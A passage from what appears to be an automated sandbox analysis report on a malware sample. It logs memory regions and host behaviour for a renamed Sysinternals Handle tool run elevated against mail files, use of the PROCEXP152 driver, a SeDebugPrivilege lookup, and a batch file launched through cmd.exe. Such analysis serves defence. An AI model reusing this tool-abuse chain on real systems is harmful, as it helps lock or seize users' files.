| private_0x000000007f48d000 | 0x7f48d000 | 0x7f48ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfaf7a0ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfaf7a10000 | 0x7dfaf7a10000 | 0x7ffaf7a0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #125: vidhs3md64.exe
527
0
| Information | Value |
|---|---|
| ID | #125 |
| File Name | c:\users\ciihmn~1\appdata\local\temp\vidhs3md64.exe |
| Command Line | vIDhS3md.exe -accepteula "WinMail.exe.mui" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:04:46, Reason: Child Process |
| Unmonitor | End Time: 00:04:54, Reason: Self Terminated |
| Monitor Duration | 00:00:08 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x834 |
| Parent PID | 0x904 (c:\users\ciihmnxmn6ps\desktop\vidhs3md.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
268
0x
3E4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00026fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00043fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0014ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000150000 | 0x00150000 | 0x00153fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000160000 | 0x00160000 | 0x00160fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x00171fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00180000 | 0x0023dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000240000 | 0x00240000 | 0x00246fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000250000 | 0x00250000 | 0x0034ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000350000 | 0x00350000 | 0x0044ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000450000 | 0x00450000 | 0x005d7fff | Pagefile Backed Memory | r |
|
|
|
- |
| imm32.dll | 0x005e0000 | 0x00613fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000005e0000 | 0x005e0000 | 0x007cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000005e0000 | 0x005e0000 | 0x00760fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000770000 | 0x00770000 | 0x00770fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000780000 | 0x00780000 | 0x00780fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000007c0000 | 0x007c0000 | 0x007cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000007d0000 | 0x007d0000 | 0x01bcffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001bd0000 | 0x01bd0000 | 0x01dbffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001bd0000 | 0x01bd0000 | 0x01cd9fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001db0000 | 0x01db0000 | 0x01dbffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fac6000 | 0x7fac6000 | 0x7fac6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| vidhs3md64.exe | 0x140000000 | 0x140045fff | Memory Mapped File | rwx |
|
|
|
|
| pagefile_0x00007ff5ffed0000 | 0x7ff5ffed0000 | 0x7ff5fffcffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff5fffd0000 | 0x7ff5fffd0000 | 0x7ff5ffff2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff5ffffa000 | 0x7ff5ffffa000 | 0x7ff5ffffbfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff5ffffc000 | 0x7ff5ffffc000 | 0x7ff5ffffdfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff5ffffe000 | 0x7ff5ffffe000 | 0x7ff5ffffefff | Private Memory | rw |
|
|
|
- |
| comctl32.dll | 0x7ffae5c40000 | 0x7ffae5ce9fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x7ffaeb6f0000 | 0x7ffaeb6f9fff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x7ffaf4440000 | 0x7ffaf4489fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7ffaf4490000 | 0x7ffaf44a2fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ffaf44d0000 | 0x7ffaf44defff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x7ffaf4590000 | 0x7ffaf4bb7fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x7ffaf4bc0000 | 0x7ffaf4c72fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ffaf4e50000 | 0x7ffaf502cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ffaf5140000 | 0x7ffaf528dfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ffaf5290000 | 0x7ffaf53b5fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7ffaf53c0000 | 0x7ffaf53f5fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ffaf5700000 | 0x7ffaf579cfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ffaf57a0000 | 0x7ffaf57fafff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ffaf5800000 | 0x7ffaf5984fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x7ffaf5990000 | 0x7ffaf6eb4fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7ffaf6f70000 | 0x7ffaf70cbfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ffaf70d0000 | 0x7ffaf717cfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ffaf72e0000 | 0x7ffaf755bfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7ffaf75d0000 | 0x7ffaf7675fff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7ffaf7860000 | 0x7ffaf78b0fff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x7ffaf7930000 | 0x7ffaf7a07fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | \\.\PROCEXP152 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
2 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 29 |
|
1 |
Registry (7)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\Software\Sysinternals\Handle | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Sysinternals | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Sysinternals | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Sysinternals\Handle | - |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Sysinternals | value_name = EulaAccepted, data = 0 |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Sysinternals\Handle | value_name = EulaAccepted, data = 1 |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Sysinternals\Handle | value_name = EulaAccepted, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 |
Process (100)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | c:\windows\syswow64\takeown.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\takeown.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\syswow64\takeown.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\users\ciihmnxmn6ps\desktop\vidhs3md.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\wbem\wmiprvse.exe | desired_access = PROCESS_DUP_HANDLE |
|
2 | |
| Open | c:\windows\system32\wbem\wmiprvse.exe | desired_access = PROCESS_DUP_HANDLE |
|
2 | |
| Open | c:\windows\system32\wbem\wmiprvse.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_DUP_HANDLE |
|
2 | |
| Open | c:\windows\system32\spoolsv.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\dwm.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\csrss.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | System | desired_access = PROCESS_DUP_HANDLE |
|
5 | |
| Open | System | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\smss.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\csrss.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\wininit.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\csrss.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\winlogon.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\services.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\lsass.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\dwm.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\spoolsv.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\common files\microsoft shared\clicktorun\officeclicktorun.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskhostw.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\runtimebroker.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\reference assemblies\nigeria reached hindu.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows media player\style-percent.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\italian.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\google\november.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows media player\photoshop_hormone_protein.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\msbuild\expenditurevincenttablet.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows nt\deaths.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office 15\alfred.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\reference assemblies\admit.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows nt\set.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows portable devices\regulations_consensus_score.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\common files\upgrading.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\google\syria promptly.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows multimedia platform\tones engaging.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows portable devices\restaurant.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows mail\th-italia.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\audiodg.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\users\ciihmnxmn6ps\desktop\current_dirnwovkcyl.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\sppsvc.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\wscript.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\wbem\wmiadap.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskeng.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\wbem\wmiprvse.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\reg.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\users\ciihmnxmn6ps\desktop\vidhs3md.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\takeown.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\takeown.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 |
Module (68)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x7ffaf70d0000 |
|
2 | |
| Get Handle | c:\windows\system32\ntdll.dll | base_address = 0x7ffaf7a10000 |
|
15 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmn~1\appdata\local\temp\vidhs3md64.exe, file_name_orig = C:\Users\CIIHMN~1\AppData\Local\Temp\vIDhS3md64.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | address_out = 0x7ffaf70f02a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x7ffaf70f23f0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x7ffaf70e63c0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x7ffaf70ed920 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x7ffaf70f5620 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventExW, address_out = 0x7ffaf70f5580 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x7ffaf70f55e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7ffaf70f0e10 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7ffaf70ef110 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x7ffaf7a4cb10 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x7ffaf7a55790 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x7ffaf7a4ea10 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x7ffaf70f28c0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadpoolWait, address_out = 0x7ffaf7a4c470 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x7ffaf7a55410 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x7ffaf7aa42f0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x7ffaf7a895e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x7ffaf7aa3130 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7ffaf70f0fb0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x7ffaf7112720 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x7ffaf4f0e7a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7ffaf71128e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CompareStringEx, address_out = 0x7ffaf70e6010 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetDateFormatEx, address_out = 0x7ffaf7112a00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7ffaf70f0310 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTimeFormatEx, address_out = 0x7ffaf7112bc0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7ffaf70f25d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsValidLocaleName, address_out = 0x7ffaf7112cd0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LCMapStringEx, address_out = 0x7ffaf70e6000 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentPackageId, address_out = 0x7ffaf4ea45e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTickCount64, address_out = 0x7ffaf70e65a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsWow64Process, address_out = 0x7ffaf70ee960 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQueryInformationProcess, address_out = 0x7ffaf7aa36d0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQueryInformationThread, address_out = 0x7ffaf7aa3790 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQuerySystemInformation, address_out = 0x7ffaf7aa38a0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQuerySymbolicLinkObject, address_out = 0x7ffaf7aa4980 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQueryDirectoryObject, address_out = 0x7ffaf7aa47f0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtOpenSymbolicLinkObject, address_out = 0x7ffaf7aa46c0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtOpenDirectoryObject, address_out = 0x7ffaf7aa3ac0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQueryObject, address_out = 0x7ffaf7aa3640 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQuerySection, address_out = 0x7ffaf7aa3a50 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = RtlInitAnsiString, address_out = 0x7ffaf7a75d30 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = RtlInitUnicodeString, address_out = 0x7ffaf7a2f0d0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = RtlAnsiStringToUnicodeString, address_out = 0x7ffaf7a336a0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = RtlFreeUnicodeString, address_out = 0x7ffaf7a37110 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = RtlFreeAnsiString, address_out = 0x7ffaf7a37110 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = RtlUnicodeStringToAnsiString, address_out = 0x7ffaf7a33dc0 |
|
1 |
Driver (291)
| Operation | Driver | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Control | \\.\PROCEXP152 | control_code = 0x83350048 |
|
203 | |
| Control | \\.\PROCEXP152 | control_code = 0x8335004c |
|
4 | |
| Control | \\.\PROCEXP152 | control_code = 0x8335004c |
|
1 | |
| Control | \\.\PROCEXP152 | control_code = 0x83350048 |
|
2 | |
| Control | \\.\PROCEXP152 | control_code = 0x8335003c |
|
6 | |
| Control | \\.\PROCEXP152 | control_code = 0x83350014 |
|
5 | |
| Control | \\.\PROCEXP152 | control_code = 0x8335000c |
|
70 |
User (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Lookup Privilege | privilege = SeDebugPrivilege, luid = 20 |
|
1 |
System (15)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | - |
|
7 | |
| Get Info | - |
|
1 | |
| Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
5 | |
| Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Get Info | type = Operating System |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #126: cmd.exe
220
0
| Information | Value |
|---|---|
| ID | #126 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c ""C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat" "C:\Program Files\Windows Mail\wabmig.exe"" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:04:48, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:13 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x6e0 |
| Parent PID | 0xbd0 (c:\users\ciihmnxmn6ps\desktop\current_dirnwovkcyl.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
304
0x
DD8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x00000000006d0000 | 0x006d0000 | 0x006effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000006d0000 | 0x006d0000 | 0x006dffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000006e0000 | 0x006e0000 | 0x006e3fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000006f0000 | 0x006f0000 | 0x006f1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000006f0000 | 0x006f0000 | 0x006f3fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000700000 | 0x00700000 | 0x00713fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000720000 | 0x00720000 | 0x0075ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000760000 | 0x00760000 | 0x0085ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000860000 | 0x00860000 | 0x00863fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000870000 | 0x00870000 | 0x00870fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000880000 | 0x00880000 | 0x00881fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00890000 | 0x0094dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000950000 | 0x00950000 | 0x0098ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000990000 | 0x00990000 | 0x0099ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000a10000 | 0x00a10000 | 0x00a1ffff | Private Memory | rw |
|
|
|
